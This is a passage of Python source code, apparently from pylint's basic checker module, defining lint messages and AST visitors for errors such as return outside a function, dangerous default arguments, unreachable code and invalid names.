astroid.ExceptHandler): current = current.parent if not current or not utils.error_of_type(current.parent, ImportError): return False try_block = current.parent.parent for import_node in try_block.nodes_of_class((astroid.ImportFrom, astroid.Import)): for name, alias in import_node.names: if alias: if alias == node.name: return True elif name == node.name: return True return False def in_loop(node): """return True if the node is inside a kind of for loop""" parent = node.parent while parent is not None: if isinstance(parent, (astroid.For, astroid.ListComp, astroid.SetComp, astroid.DictComp, astroid.GeneratorExp)): return True parent = parent.parent return False def in_nested_list(nested_list, obj): """return true if the object is an element of <nested_list> or of a nested list """ for elmt in nested_list: if isinstance(elmt, (list, tuple)): if in_nested_list(elmt, obj): return True elif elmt == obj: return True return False def _get_break_loop_node(break_node): """ Returns the loop node that holds the break node in arguments. Args: break_node (astroid.Break): the break node of interest. Returns: astroid.For or astroid.While: the loop node holding the break node. """ loop_nodes = (astroid.For, astroid.While) parent = break_node.parent while not isinstance(parent, loop_nodes) or break_node in getattr(parent, 'orelse', []): parent = parent.parent if parent is None: break return parent def _loop_exits_early(loop): """ Returns true if a loop may ends up in a break statement. Args: loop (astroid.For, astroid.While): the loop node inspected. Returns: bool: True if the loop may ends up in a break statement, False otherwise. """ loop_nodes = (astroid.For, astroid.While) definition_nodes = (astroid.FunctionDef, astroid.ClassDef) inner_loop_nodes = [ _node for _node in loop.nodes_of_class(loop_nodes, skip_klass=definition_nodes) if _node != loop ] return any( _node for _node in loop.nodes_of_class(astroid.Break, skip_klass=definition_nodes) if _get_break_loop_node(_node) not in inner_loop_nodes ) def _is_multi_naming_match(match, node_type, confidence): return (match is not None and match.lastgroup is not None and match.lastgroup not in EXEMPT_NAME_CATEGORIES and (node_type != 'method' or confidence != interfaces.INFERENCE_FAILURE)) if sys.version_info < (3, 0): BUILTIN_PROPERTY = '__builtin__.property' else: BUILTIN_PROPERTY = 'builtins.property' def _get_properties(config): """Returns a tuple of property classes and names. Property classes are fully qualified, such as 'abc.abstractproperty' and property names are the actual names, such as 'abstract_property'. """ property_classes = set((BUILTIN_PROPERTY,)) property_names = set() # Not returning 'property', it has its own check. if config is not None: property_classes.update(config.property_classes) property_names.update((prop.rsplit('.', 1)[-1] for prop in config.property_classes)) return property_classes, property_names def _determine_function_name_type(node, config=None): """Determine the name type whose regex the a function's name should match. :param node: A function node. :type node: astroid.node_classes.NodeNG :param config: Configuration from which to pull additional property classes. :type config: :class:`optparse.Values` :returns: One of ('function', 'method', 'attr') :rtype: str """ property_classes, property_names = _get_properties(config) if not node.is_method(): return 'function' if node.decorators: decorators = node.decorators.nodes else: decorators = [] for decorator in decorators: # If the function is a property (decorated with @property # or @abc.abstractproperty), the name type is 'attr'. if (isinstance(decorator, astroid.Name) or (isinstance(decorator, astroid.Attribute) and decorator.attrname in property_names)): infered = utils.safe_infer(decorator) if infered and infered.qname() in property_classes: return 'attr' # If the function is decorated using the prop_method.{setter,getter} # form, treat it like an attribute as well. elif (isinstance(decorator, astroid.Attribute) and decorator.attrname in ('setter', 'deleter')): return 'attr' return 'method' def _has_abstract_methods(node): """ Determine if the given `node` has abstract methods. The methods should be made abstract by decorating them with `abc` decorators. """ return len(utils.unimplemented_abstract_methods(node)) > 0 def report_by_type_stats(sect, stats, old_stats): """make a report of * percentage of different types documented * percentage of different types with a bad name """ # percentage of different types documented and/or with a bad name nice_stats = {} for node_type in ('module', 'class', 'method', 'function'): try: total = stats[node_type] except KeyError: raise exceptions.EmptyReportError() nice_stats[node_type] = {} if total != 0: try: documented = total - stats['undocumented_'+node_type] percent = (documented * 100.) / total nice_stats[node_type]['percent_documented'] = '%.2f' % percent except KeyError: nice_stats[node_type]['percent_documented'] = 'NC' try: percent = (stats['badname_'+node_type] * 100.) / total nice_stats[node_type]['percent_badname'] = '%.2f' % percent except KeyError: nice_stats[node_type]['percent_badname'] = 'NC' lines = ('type', 'number', 'old number', 'difference', '%documented', '%badname') for node_type in ('module', 'class', 'method', 'function'): new = stats[node_type] old = old_stats.get(node_type, None) if old is not None: diff_str = reporters.diff_string(old, new) else: old, diff_str = 'NC', 'NC' lines += (node_type, str(new), str(old), diff_str, nice_stats[node_type].get('percent_documented', '0'), nice_stats[node_type].get('percent_badname', '0')) sect.append(reporter_nodes.Table(children=lines, cols=6, rheaders=1)) def redefined_by_decorator(node): """return True if the object is a method redefined via decorator. For example: @property def x(self): return self._x @x.setter def x(self, value): self._x = value """ if node.decorators: for decorator in node.decorators.nodes: if (isinstance(decorator, astroid.Attribute) and getattr(decorator.expr, 'name', None) == node.name): return True return False class _BasicChecker(checkers.BaseChecker): __implements__ = interfaces.IAstroidChecker name = 'basic' class BasicErrorChecker(_BasicChecker): msgs = { 'E0100': ('__init__ method is a generator', 'init-is-generator', 'Used when the special class method __init__ is turned into a ' 'generator by a yield in its body.'), 'E0101': ('Explicit return in __init__', 'return-in-init', 'Used when the special class method __init__ has an explicit ' 'return value.'), 'E0102': ('%s already defined line %s', 'function-redefined', 'Used when a function / class / method is redefined.'), 'E0103': ('%r not properly in loop', 'not-in-loop', 'Used when break or continue keywords are used outside a loop.'), 'E0104': ('Return outside function', 'return-outside-function', 'Used when a "return" statement is found outside a function or ' 'method.'), 'E0105': ('Yield outside function', 'yield-outside-function', 'Used when a "yield" statement is found outside a function or ' 'method.'), 'E0106': ('Return with argument inside generator', 'return-arg-in-generator', 'Used when a "return" statement with an argument is found ' 'outside in a generator function or method (e.g. with some ' '"yield" statements).', {'maxversion': (3, 3)}), 'E0107': ("Use of the non-existent %s operator", 'nonexistent-operator', "Used when you attempt to use the C-style pre-increment or " "pre-decrement operator -- and ++, which doesn't exist in Python."), 'E0108': ('Duplicate argument name %s in function definition', 'duplicate-argument-name', 'Duplicate argument names in function definitions are syntax' ' errors.'), 'E0110': ('Abstract class %r with abstract methods instantiated', 'abstract-class-instantiated', 'Used when an abstract class with `abc.ABCMeta` as metaclass ' 'has abstract methods and is instantiated.'), 'W0120': ('Else clause on loop without a break statement', 'useless-else-on-loop', 'Loops should only have an else clause if they can exit early ' 'with a break statement, otherwise the statements under else ' 'should be on the same scope as the loop itself.'), 'E0112': ('More than one starred expression in assignment', 'too-many-star-expressions', 'Emitted when there are more than one starred ' 'expressions (`*x`) in an assignment. This is a SyntaxError.'), 'E0113': ('Starred assignment target must be in a list or tuple', 'invalid-star-assignment-target', 'Emitted when a star expression is used as a starred ' 'assignment target.'), 'E0114': ('Can use starred expression only in assignment target', 'star-needs-assignment-target', 'Emitted when a star expression is not used in an ' 'assignment target.'), 'E0115': ('Name %r is nonlocal and global', 'nonlocal-and-global', 'Emitted when a name is both nonlocal and global.'), 'E0116': ("'continue' not supported inside 'finally' clause", 'continue-in-finally', 'Emitted when the `continue` keyword is found ' 'inside a finally clause, which is a SyntaxError.'), 'E0117': ("nonlocal name %s found without binding", 'nonlocal-without-binding', 'Emitted when a nonlocal variable does not have an attached ' 'name somewhere in the parent scopes'), 'E0118': ("Name %r is used prior to global declaration", 'used-prior-global-declaration', 'Emitted when a name is used prior a global declaration, ' 'which results in an error since Python 3.6.', {'minversion': (3, 6)}), } @utils.check_messages('function-redefined') def visit_classdef(self, node): self._check_redefinition('class', node) @utils.check_messages('too-many-star-expressions', 'invalid-star-assignment-target') def visit_assign(self, node): starred = list(node.targets[0].nodes_of_class(astroid.Starred)) if len(starred) > 1: self.add_message('too-many-star-expressions', node=node) # Check *a = b if isinstance(node.targets[0], astroid.Starred): self.add_message('invalid-star-assignment-target', node=node) @utils.check_messages('star-needs-assignment-target') def visit_starred(self, node): """Check that a Starred expression is used in an assignment target.""" if isinstance(node.parent, astroid.Call): # f(*args) is converted to Call(args=[Starred]), so ignore # them for this check. return if PY35 and isinstance(node.parent, (astroid.List, astroid.Tuple, astroid.Set, astroid.Dict)): # PEP 448 unpacking. return stmt = node.statement() if not isinstance(stmt, astroid.Assign): return if stmt.value is node or stmt.value.parent_of(node): self.add_message('star-needs-assignment-target', node=node) @utils.check_messages('init-is-generator', 'return-in-init', 'function-redefined', 'return-arg-in-generator', 'duplicate-argument-name', 'nonlocal-and-global', 'used-prior-global-declaration') def visit_functiondef(self, node): self._check_nonlocal_and_global(node) self._check_name_used_prior_global(node) if (not redefined_by_decorator(node) and not utils.is_registered_in_singledispatch_function(node)): self._check_redefinition(node.is_method() and 'method' or 'function', node) # checks for max returns, branch, return in __init__ returns = node.nodes_of_class(astroid.Return, skip_klass=(astroid.FunctionDef, astroid.ClassDef)) if node.is_method() and node.name == '__init__': if node.is_generator(): self.add_message('init-is-generator', node=node) else: values = [r.value for r in returns] # Are we returning anything but None from constructors if any(v for v in values if not utils.is_none(v)): self.add_message('return-in-init', node=node) elif node.is_generator(): # make sure we don't mix non-None returns and yields if not PY33: for retnode in returns: if isinstance(retnode.value, astroid.Const) and \ retnode.value.value is not None: self.add_message('return-arg-in-generator', node=node, line=retnode.fromlineno) # Check for duplicate names args = set() for name in node.argnames(): if name in args: self.add_message('duplicate-argument-name', node=node, args=(name,)) else: args.add(name) visit_asyncfunctiondef = visit_functiondef def _check_name_used_prior_global(self, node): scope_globals = { name: child for child in node.nodes_of_class(astroid.Global) for name in child.names if child.scope() is node } for node_name in node.nodes_of_class(astroid.Name): if node_name.scope() is not node: continue name = node_name.name corresponding_global = scope_globals.get(name) if not corresponding_global: continue global_lineno = corresponding_global.fromlineno if global_lineno and global_lineno > node_name.fromlineno: self.add_message('used-prior-global-declaration', node=node_name, args=(name, )) def _check_nonlocal_and_global(self, node): """Check that a name is both nonlocal and global.""" def same_scope(current): return current.scope() is node from_iter = itertools.chain.from_iterable nonlocals = set(from_iter( child.names for child in node.nodes_of_class(astroid.Nonlocal) if same_scope(child))) global_vars = set(from_iter( child.names for child in node.nodes_of_class(astroid.Global) if same_scope(child))) for name in nonlocals.intersection(global_vars): self.add_message('nonlocal-and-global', args=(name, ), node=node) @utils.check_messages('return-outside-function') def visit_return(self, node): if not isinstance(node.frame(), astroid.FunctionDef): self.add_message('return-outside-function', node=node) @utils.check_messages('yield-outside-function') def visit_yield(self, node): self._check_yield_outside_func(node) @utils.check_messages('yield-outside-function') def visit_yieldfrom(self, node): self._check_yield_outside_func(node) @utils.check_messages('not-in-loop', 'continue-in-finally') def visit_continue(self, node): self._check_in_loop(node, 'continue') @utils.check_messages('not-in-loop') def visit_break(self, node): self._check_in_loop(node, 'break') @utils.check_messages('useless-else-on-loop') def visit_for(self, node): self._check_else_on_loop(node) @utils.check_messages('useless-else-on-loop') def visit_while(self, node): self._check_else_on_loop(node) @utils.check_messages('nonexistent-operator') def visit_unaryop(self, node): """check use of the non-existent ++ and -- operator operator""" if ((node.op in '+-') and isinstance(node.operand, astroid.UnaryOp) and (node.operand.op == node.op)): self.add_message('nonexistent-operator', node=node, args=node.op*2) def _check_nonlocal_without_binding(self, node, name): current_scope = node.scope() while True: if current_scope.parent is None: break if not isinstance(current_scope, (astroid.ClassDef, astroid.FunctionDef)): self.add_message('nonlocal-without-binding', args=(name, ), node=node) return if name not in current_scope.locals: current_scope = current_scope.parent.scope() continue # Okay, found it. return if not isinstance(current_scope, astroid.FunctionDef): self.add_message('nonlocal-without-binding', args=(name, ), node=node) @utils.check_messages('nonlocal-without-binding') def visit_nonlocal(self, node): for name in node.names: self._check_nonlocal_without_binding(node, name) @utils.check_messages('abstract-class-instantiated') def visit_call(self, node): """ Check instantiating abstract class with abc.ABCMeta as metaclass. """ try: for inferred in node.func.infer(): self._check_inferred_class_is_abstract(inferred, node) except astroid.InferenceError: return def _check_inferred_class_is_abstract(self, infered, node): if not isinstance(infered, astroid.ClassDef): return klass = utils.node_frame_class(node) if klass is infered: # Don't emit the warning if the class is instantiated # in its own body or if the call is not an instance # creation. If the class is instantiated into its own # body, we're expecting that it knows what it is doing. return # __init__ was called metaclass = infered.metaclass() abstract_methods = _has_abstract_methods(infered) if metaclass is None: # Python 3.4 has `abc.ABC`, which won't be detected # by ClassNode.metaclass() for ancestor in infered.ancestors(): if ancestor.qname() == 'abc.ABC' and abstract_methods: self.add_message('abstract-class-instantiated', args=(infered.name, ), node=node) break return if metaclass.qname() == 'abc.ABCMeta' and abstract_methods: self.add_message('abstract-class-instantiated', args=(infered.name, ), node=node) def _check_yield_outside_func(self, node): if not isinstance(node.frame(), (astroid.FunctionDef, astroid.Lambda)): self.add_message('yield-outside-function', node=node) def _check_else_on_loop(self, node): """Check that any loop with an else clause has a break statement.""" if node.orelse and not _loop_exits_early(node): self.add_message('useless-else-on-loop', node=node, # This is not optimal, but the line previous # to the first statement in the else clause # will usually be the one that contains the else:. line=node.orelse[0].lineno - 1) def _check_in_loop(self, node, node_name): """check that a node is inside a for or while loop""" _node = node.parent while _node: if isinstance(_node, (astroid.For, astroid.While)): if node not in _node.orelse: return if isinstance(_node, (astroid.ClassDef, astroid.FunctionDef)): break if (isinstance(_node, astroid.TryFinally) and node in _node.finalbody and isinstance(node, astroid.Continue)): self.add_message('continue-in-finally', node=node) _node = _node.parent self.add_message('not-in-loop', node=node, args=node_name) def _check_redefinition(self, redeftype, node): """check for redefinition of a function / method / class name""" defined_self = node.parent.frame()[node.name] if defined_self is not node and not astroid.are_exclusive(node, defined_self): dummy_variables_rgx = lint_utils.get_global_option( self, 'dummy-variables-rgx', default=None) if dummy_variables_rgx and dummy_variables_rgx.match(node.name): return self.add_message('function-redefined', node=node, args=(redeftype, defined_self.fromlineno)) class BasicChecker(_BasicChecker): """checks for : * doc strings * number of arguments, local variables, branches, returns and statements in functions, methods * required module attributes * dangerous default values as arguments * redefinition of function / method / class * uses of the global statement """ __implements__ = interfaces.IAstroidChecker name = 'basic' msgs = { 'W0101': ('Unreachable code', 'unreachable', 'Used when there is some code behind a "return" or "raise" ' 'statement, which will never be accessed.'), 'W0102': ('Dangerous default value %s as argument', 'dangerous-default-value', 'Used when a mutable value as list or dictionary is detected in ' 'a default value for an argument.'), 'W0104': ('Statement seems to have no effect', 'pointless-statement', 'Used when a statement doesn\'t have (or at least seems to) ' 'any effect.'), 'W0105': ('String statement has no effect', 'pointless-string-statement', 'Used when a string is used as a statement (which of course ' 'has no effect). This is a particular case of W0104 with its ' 'own message so you can easily disable it if you\'re using ' 'those strings as documentation, instead of comments.'), 'W0106': ('Expression "%s" is assigned to nothing', 'expression-not-assigned', 'Used when an expression that is not a function call is assigned ' 'to nothing. Probably something else was intended.'), 'W0108': ('Lambda may not be necessary', 'unnecessary-lambda', 'Used when the body of a lambda expression is a function call ' 'on the same argument list as the lambda itself; such lambda ' 'expressions are in all but a few cases replaceable with the ' 'function being called in the body of the lambda.'), 'W0109': ("Duplicate key %r in dictionary", 'duplicate-key', 'Used when a dictionary expression binds the same key multiple ' 'times.'), 'W0122': ('Use of exec', 'exec-used', 'Used when you use the "exec" statement (function for Python ' '3), to discourage its usage. That doesn\'t ' 'mean you cannot use it !'), 'W0123': ('Use of eval', 'eval-used', 'Used when you use the "eval" function, to discourage its ' 'usage. Consider using `ast.literal_eval` for safely evaluating ' 'strings containing Python expressions ' 'from untrusted sources. '), 'W0150': ("%s statement in finally block may swallow exception", 'lost-exception', 'Used when a break or a return statement is found inside the ' 'finally clause of a try...finally block: the exceptions raised ' 'in the try clause will be silently swallowed instead of being ' 're-raised.'), 'W0199': ('Assert called on a 2-uple. Did you mean \'assert x,y\'?', 'assert-on-tuple', 'A call of assert on a tuple will always evaluate to true if ' 'the tuple is not empty, and will always evaluate to false if ' 'it is.'), 'W0124': ('Following "as" with another context manager looks like a tuple.', 'confusing-with-statement', 'Emitted when a `with` statement component returns multiple values ' 'and uses name binding with `as` only for a part of those values, ' 'as in with ctx() as a, b. This can be misleading, since it\'s not ' 'clear if the context manager returns a tuple or if the node without ' 'a name binding is another context manager.'), 'W0125': ('Using a conditional statement with a constant value', 'using-constant-test', 'Emitted when a conditional statement (If or ternary if) ' 'uses a constant value for its test. This might not be what ' 'the user intended to do.'), 'E0111': ('The first reversed() argument is not a sequence', 'bad-reversed-sequence', 'Used when the first argument to reversed() builtin ' 'isn\'t a sequence (does not implement __reversed__, ' 'nor __getitem__ and __len__'), } reports = (('RP0101', 'Statistics by type', report_by_type_stats),) def __init__(self, linter): _BasicChecker.__init__(self, linter) self.stats = None self._tryfinallys = None def open(self): """initialize visit variables and statistics """ self._tryfinallys = [] self.stats = self.linter.add_stats(module=0, function=0, method=0, class_=0) @utils.check_messages('using-constant-test') def visit_if(self, node): self._check_using_constant_test(node, node.test) @utils.check_messages('using-constant-test') def visit_ifexp(self, node): self._check_using_constant_test(node, node.test) @utils.check_messages('using-constant-test') def visit_comprehension(self, node): if node.ifs: for if_test in node.ifs: self._check_using_constant_test(node, if_test) def _check_using_constant_test(self, node, test): const_nodes = ( astroid.Module, astroid.scoped_nodes.GeneratorExp, astroid.Lambda, astroid.FunctionDef, astroid.ClassDef, astroid.bases.Generator, astroid.UnboundMethod, astroid.BoundMethod, astroid.Module) structs = (astroid.Dict, astroid.Tuple, astroid.Set) # These nodes are excepted, since they are not constant # values, requiring a computation to happen. The only type # of node in this list which doesn't have this property is # Attribute, which is excepted because the conditional statement # can be used to verify that the attribute was set inside a class, # which is definitely a valid use case. except_nodes = (astroid.Attribute, astroid.Call, astroid.BinOp, astroid.BoolOp, astroid.UnaryOp, astroid.Subscript) inferred = None emit = isinstance(test, (astroid.Const, ) + structs + const_nodes) if not isinstance(test, except_nodes): inferred = utils.safe_infer(test) if emit or isinstance(inferred, const_nodes): self.add_message('using-constant-test', node=node) def visit_module(self, _): """check module name, docstring and required arguments """ self.stats['module'] += 1 def visit_classdef(self, node): # pylint: disable=unused-argument """check module name, docstring and redefinition increment branch counter """ self.stats['class'] += 1 @utils.check_messages('pointless-statement', 'pointless-string-statement', 'expression-not-assigned') def visit_expr(self, node): """check for various kind of statements without effect""" expr = node.value if isinstance(expr, astroid.Const) and isinstance(expr.value, str): # treat string statement in a separated message # Handle PEP-257 attribute docstrings. # An attribute docstring is defined as being a string right after # an assignment at the module level, class level or __init__ level. scope = expr.scope() if isinstance(scope, (astroid.ClassDef, astroid.Module, astroid.FunctionDef)): if isinstance(scope, astroid.FunctionDef) and scope.name != '__init__': pass else: sibling = expr.previous_sibling() if (sibling is not None and sibling.scope() is scope and isinstance(sibling, astroid.Assign)): return self.add_message('pointless-string-statement', node=node) return # ignore if this is : # * a direct function call # * the unique child of a try/except body # * a yield (which are wrapped by a discard node in _ast XXX) # warn W0106 if we have any underlying function call (we can't predict # side effects), else pointless-statement if (isinstance(expr, (astroid.Yield, astroid.Await, astroid.Call)) or (isinstance(node.parent, astroid.TryExcept) and node.parent.body == [node])): return if any(expr.nodes_of_class(astroid.Call)): self.add_message('expression-not-assigned', node=node, args=expr.as_string()) else: self.add_message('pointless-statement', node=node) @staticmethod def _filter_vararg(node, call_args): # Return the arguments for the given call which are # not passed as vararg. for arg in call_args: if isinstance(arg, astroid.Starred): if (isinstance(arg.value, astroid.Name) and arg.value.name != node.args.vararg): yield arg else: yield arg @staticmethod def _has_variadic_argument(args, variadic_name): if not args: return True for arg in args: if isinstance(arg.value, astroid.Name): if arg.value.name != variadic_name: return True else: return True return False @utils.check_messages('unnecessary-lambda') def visit_lambda(self, node): """check whether or not the lambda is suspicious """ # if the body of the lambda is a call expression with the same # argument list as the lambda itself, then the lambda is # possibly unnecessary and at least suspicious. if node.args.defaults: # If the arguments of the lambda include defaults, then a # judgment cannot be made because there is no way to check # that the defaults defined by the lambda are the same as # the defaults defined by the function called in the body # of the lambda. return call = node.body if not isinstance(call, astroid.Call): # The body of the lambda must be a function call expression # for the lambda to be unnecessary. return if (isinstance(node.body.func, astroid.Attribute) and isinstance(node.body.func.expr, astroid.Call)): # Chained call, the intermediate call might # return something else (but we don't check that, yet). return ordinary_args = list(node.args.args) new_call_args = list(self._filter_vararg(node, call.args)) if node.args.kwarg: if self._has_variadic_argument(call.kwargs, node.args.kwarg): return elif call.kwargs or call.keywords: return if node.args.vararg: if self._has_variadic_argument(call.starargs, node.args.vararg): return elif call.starargs: return # The "ordinary" arguments must be in a correspondence such that: # ordinary_args[i].name == call.args[i].name. if len(ordinary_args) != len(new_call_args): return for arg, passed_arg in zip(ordinary_args, new_call_args): if not isinstance(passed_arg, astroid.Name): return if arg.name != passed_arg.name: return self.add_message('unnecessary-lambda', line=node.fromlineno, node=node) @utils.check_messages('dangerous-default-value') def visit_functiondef(self, node): """check function name, docstring, arguments, redefinition, variable names, max locals """ self.stats[node.is_method() and 'method' or 'function'] += 1 self._check_dangerous_default(node) visit_asyncfunctiondef = visit_functiondef def _check_dangerous_default(self, node): # check for dangerous default values as arguments is_iterable = lambda n: isinstance(n, (astroid.List, astroid.Set, astroid.Dict)) for default in node.args.defaults: try: value = next(default.infer()) except astroid.InferenceError: continue if (isinstance(value, astroid.Instance) and value.qname() in DEFAULT_ARGUMENT_SYMBOLS): if value is default: msg = DEFAULT_ARGUMENT_SYMBOLS[value.qname()] elif isinstance(value, astroid.Instance) or is_iterable(value): # We are here in the following situation(s): # * a dict/set/list/tuple call which wasn't inferred # to a syntax node ({}, () etc.). This can happen # when the arguments are invalid or unknown to # the inference. # * a variable from somewhere else, which turns out to be a list # or a dict. if is_iterable(default): msg = value.pytype() elif isinstance(default, astroid.Call): msg = '%s() (%s)' % (value.name, value.qname()) else: msg = '%s (%s)' % (default.as_string(), value.qname()) else: # this argument is a name msg = '%s (%s)' % (default.as_string(), DEFAULT_ARGUMENT_SYMBOLS[value.qname()]) self.add_message('dangerous-default-value', node=node, args=(msg, )) @utils.check_messages('unreachable', 'lost-exception') def visit_return(self, node): """1 - check is the node has a right sibling (if so, that's some unreachable code) 2 - check is the node is inside the finally clause of a try...finally block """ self._check_unreachable(node) # Is it inside final body of a try...finally bloc ? self._check_not_in_finally(node, 'return', (astroid.FunctionDef,)) @utils.check_messages('unreachable') def visit_continue(self, node): """check is the node has a right sibling (if so, that's some unreachable code) """ self._check_unreachable(node) @utils.check_messages('unreachable', 'lost-exception') def visit_break(self, node): """1 - check is the node has a right sibling (if so, that's some unreachable code) 2 - check is the node is inside the finally clause of a try...finally block """ # 1 - Is it right sibling ? self._check_unreachable(node) # 2 - Is it inside final body of a try...finally bloc ? self._check_not_in_finally(node, 'break', (astroid.For, astroid.While,)) @utils.check_messages('unreachable') def visit_raise(self, node): """check if the node has a right sibling (if so, that's some unreachable code) """ self._check_unreachable(node) @utils.check_messages('exec-used') def visit_exec(self, node): """just print a warning on exec statements""" self.add_message('exec-used', node=node) @utils.check_messages('eval-used', 'exec-used', 'bad-reversed-sequence') def visit_call(self, node): """visit a Call node -> check if this is not a blacklisted builtin call and check for * or ** use """ if isinstance(node.func, astroid.Name): name = node.func.name # ignore the name if it's not a builtin (i.e. not defined in the # locals nor globals scope) if not (name in node.frame() or name in node.root()): if name == 'exec': self.add_message('exec-used', node=node) elif name == 'reversed': self._check_reversed(node) elif name == 'eval': self.add_message('eval-used', node=node) @utils.check_messages('assert-on-tuple') def visit_assert(self, node): """check the use of an assert statement on a tuple.""" if node.fail is None and isinstance(node.test, astroid.Tuple) and \ len(node.test.elts) == 2: self.add_message('assert-on-tuple', node=node) @utils.check_messages('duplicate-key') def visit_dict(self, node): """check duplicate key in dictionary""" keys = set() for k, _ in node.items: if isinstance(k, astroid.Const): key = k.value if key in keys: self.add_message('duplicate-key', node=node, args=key) keys.add(key) def visit_tryfinally(self, node): """update try...finally flag""" self._tryfinallys.append(node) def leave_tryfinally(self, node): # pylint: disable=unused-argument """update try...finally flag""" self._tryfinallys.pop() def _check_unreachable(self, node): """check unreachable code""" unreach_stmt = node.next_sibling() if unreach_stmt is not None: self.add_message('unreachable', node=unreach_stmt) def _check_not_in_finally(self, node, node_name, breaker_classes=()): """check that a node is not inside a finally clause of a try...finally statement. If we found before a try...finally bloc a parent which its type is in breaker_classes, we skip the whole check.""" # if self._tryfinallys is empty, we're not an in try...finally block if not self._tryfinallys: return # the node could be a grand-grand...-children of the try...finally _parent = node.parent _node = node while _parent and not isinstance(_parent, breaker_classes): if hasattr(_parent, 'finalbody') and _node in _parent.finalbody: self.add_message('lost-exception', node=node, args=node_name) return _node = _parent _parent = _node.parent def _check_reversed(self, node): """ check that the argument to `reversed` is a sequence """ try: argument = utils.safe_infer(utils.get_argument_from_call(node, position=0)) except utils.NoSuchArgumentError: pass else: if argument is astroid.YES: return if argument is None: # Nothing was infered. # Try to see if we have iter(). if isinstance(node.args[0], astroid.Call): try: func = next(node.args[0].func.infer()) except astroid.InferenceError: return if (getattr(func, 'name', None) == 'iter' and utils.is_builtin_object(func)): self.add_message('bad-reversed-sequence', node=node) return if isinstance(argument, astroid.Instance): if (argument._proxied.name == 'dict' and utils.is_builtin_object(argument._proxied)): self.add_message('bad-reversed-sequence', node=node) return if any(ancestor.name == 'dict' and utils.is_builtin_object(ancestor) for ancestor in argument._proxied.ancestors()): # Mappings aren't accepted by reversed(), unless # they provide explicitly a __reversed__ method. try: argument.locals[REVERSED_PROTOCOL_METHOD] except KeyError: self.add_message('bad-reversed-sequence', node=node) return for methods in REVERSED_METHODS: for meth in methods: try: argument.getattr(meth) except astroid.NotFoundError: break else: break else: self.add_message('bad-reversed-sequence', node=node) elif not isinstance(argument, (astroid.List, astroid.Tuple)): # everything else is not a proper sequence for reversed() self.add_message('bad-reversed-sequence', node=node) @utils.check_messages('confusing-with-statement') def visit_with(self, node): if not PY3K: # in Python 2 a "with" statement with multiple managers coresponds # to multiple nested AST "With" nodes pairs = [] parent_node = node.parent if isinstance(parent_node, astroid.With): # we only care about the direct parent, since this method # gets called for each with node anyway pairs.extend(parent_node.items) pairs.extend(node.items) else: # in PY3K a "with" statement with multiple managers coresponds # to one AST "With" node with multiple items pairs = node.items if pairs: for prev_pair, pair in zip(pairs, pairs[1:]): if (isinstance(prev_pair[1], astroid.AssignName) and (pair[1] is None and not isinstance(pair[0], astroid.Call))): # don't emit a message if the second is a function call # there's no way that can be mistaken for a name assignment if PY3K or node.lineno == node.parent.lineno: # if the line number doesn't match # we assume it's a nested "with" self.add_message('confusing-with-statement', node=node) KNOWN_NAME_TYPES = { "module", "const", "class", "function", "method", "attr", "argument", "variable", "class_attribute", "inlinevar" } HUMAN_READABLE_TYPES = { 'module': 'module', 'const': 'constant', 'class': 'class', 'function': 'function', 'method': 'method', 'attr': 'attribute', 'argument': 'argument', 'variable': 'variable', 'class_attribute': 'class attribute', 'inlinevar': 'inline iteration', } DEFAULT_NAMING_STYLES = { "module": "snake_case", "const": "UPPER_CASE", "class": "PascalCase", "function": "snake_case", "method": "snake_case", "attr": "snake_case", "argument": "snake_case", "variable": "snake_case", "class_attribute": "any", "inlinevar": "any", } def _create_naming_options(): name_options = [] for name_type in sorted(KNOWN_NAME_TYPES): human_readable_name = HUMAN_READABLE_TYPES[name_type] default_style = DEFAULT_NAMING_STYLES[name_type] name_type = name_type.replace('_', '-') name_options.append(( '%s-naming-style' % (name_type,), {'default': default_style, 'type': 'choice', 'choices': list(NAMING_STYLES.keys()), 'metavar': '<style>', 'help': 'Naming style matching correct %s names' % (human_readable_name,)}),) name_options.append(( '%s-rgx' % (name_type,), {'default': None, 'type': 'regexp', 'metavar': '<regexp>', 'help': 'Regular expression matching correct %s names. Overrides %s-naming-style' % (human_readable_name, name_type,)})) return tuple(name_options) class NameChecker(_BasicChecker): msgs = { 'C0102': ('Black listed name "%s"', 'blacklisted-name', 'Used when the name is listed in the black list (unauthorized ' 'names).'), 'C0103': ('%s name "%s" doesn\'t conform to %s', 'invalid-name', 'Used when the name doesn\'t conform to naming rules ' 'associated to its type (constant, variable, class...).'), 'W0111': ('Name %s will become a keyword in Python %s', 'assign-to-new-keyword', 'Used when assignment will become invalid in future ' 'Python release due to introducing new keyword'), } options = (('good-names', {'default' : ('i', 'j', 'k', 'ex', 'Run', '_'), 'type' :'csv', 'metavar' : '<names>', 'help' : 'Good variable names which should always be accepted,' ' separated by a comma'} ), ('bad-names', {'default' : ('foo', 'bar', 'baz', 'toto', 'tutu', 'tata'), 'type' :'csv', 'metavar' : '<names>', 'help' : 'Bad variable names which should always be refused, ' 'separated by a comma'} ), ('name-group', {'default' : (), 'type' :'csv', 'metavar' : '<name1:name2>', 'help' : ('Colon-delimited sets of names that determine each' ' other\'s naming style when the name regexes' ' allow several styles.')} ), ('include-naming-hint', {'default': False, 'type': 'yn', 'metavar': '<y_or_n>', 'help': 'Include a hint for the correct naming format with invalid-name'} ), ('property-classes', {'default': ('abc.abstractproperty',), 'type': 'csv', 'metavar': '<decorator names>', 'help': 'List of decorators that produce properties, such as ' 'abc.abstractproperty. Add to this list to register ' 'other decorators that produce valid properties.'} ), ) + _create_naming_options() KEYWORD_ONSET = { (3, 7): {'async', 'await'} } def __init__(self, linter): _BasicChecker.__init__(self, linter) self._name_category = {} self._name_group = {} self._bad_names = {} self._name_regexps = {} self._name_hints = {} def open(self): self.stats = self.linter.add_stats(badname_module=0, badname_class=0, badname_function=0, badname_method=0, badname_attr=0, badname_const=0, badname_variable=0, badname_inlinevar=0, badname_argument=0, badname_class_attribute=0) for group in self.config.name_group: for name_type in group.split(':'): self._name_group[name_type] = 'group_%s' % (group,) regexps, hints = self._create_naming_rules() self._name_regexps = regexps self._name_hints = hints def _create_naming_rules(self): regexps = {} hints = {} for name_type in KNOWN_NAME_TYPES: naming_style_option_name = "%s_naming_style" % (name_type,) naming_style_name = getattr(self.config, naming_style_option_name) regexps[name_type] = NAMING_STYLES[naming_style_name].get_regex(name_type) custom_regex_setting_name = "%s_rgx" % (name_type, ) custom_regex = getattr(self.config, custom_regex_setting_name, None) if custom_regex is not None: regexps[name_type] = custom_regex if custom_regex is not None: hints[name_type] = "%r pattern" % custom_regex.pattern else: hints[name_type] = "%s naming style" % naming_style_name return regexps, hints @utils.check_messages('blacklisted-name', 'invalid-name') def visit_module(self, node): self._check_name('module', 